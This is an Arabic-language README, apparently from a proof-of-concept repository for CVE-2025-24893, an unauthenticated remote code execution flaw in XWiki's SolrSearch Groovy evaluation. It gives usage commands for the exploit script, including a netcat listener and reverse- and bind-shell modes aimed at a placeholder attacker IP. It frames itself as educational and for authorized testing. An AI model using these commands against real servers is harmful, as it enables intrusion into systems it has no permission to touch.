
إثبات المفهوم لـ CVE-2025-24893 يوضح تنفيذ أوامر عن بُعد دون مصادقة في XWiki من خلال تقييم قالب غير آمن من جانب الخادم.
يحتوي هذا المستودع على إثبات مفهوم مُتحكم به لـ CVE-2025-24893، وهي ثغرة تنفيذ أوامر عن بُعد غير مُوثَّقة (RCE) تؤثر على XWiki.
تسمح الثغرة للمهاجم بتنفيذ أوامر نظام تشغيل عشوائية على الخادم بسبب التقييم غير الآمن للقوالب والبرامج النصية من جانب الخادم.
XWiki هي منصة ويكي مفتوحة المصدر للمؤسسات تُستخدم عادةً لـ:
نظرًا لأن XWiki غالبًا ما يتم نشرها على خوادم موجهة للإنترنت، فإن الثغرات الأمنية في معالجة الطلبات ومنطق البرمجة النصية يمكن أن يكون لها تأثير كبير في العالم الحقيقي.
المدخلات التي يتحكم بها المستخدم والتي تم تمريرها إلى نقطة النهاية SolrSearch لم يتم التحقق منها بشكل صحيح وتم تقييمها بواسطة محرك البرمجة النصية Groovy.
سمح ذلك بتفسير المدخلات المقدمة من المهاجم على أنها كود قابل للتنفيذ من جانب الخادم، مما أدى إلى تنفيذ الأوامر على النظام المضيف.
يوضح إثبات المفهوم هذا ما يلي:
python3 xwiki_cve_2025_24893.py http://target:8080 -m check
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444
SolrSearchتم توفير هذا المشروع بدقة للأغراض التعليمية واختبار الأمان المصرح به.
أي استخدام غير مصرح به لهذا الكود ضد أنظمة دون إذن صريح محظور.
تم إنشاء هذا المستودع لإظهار: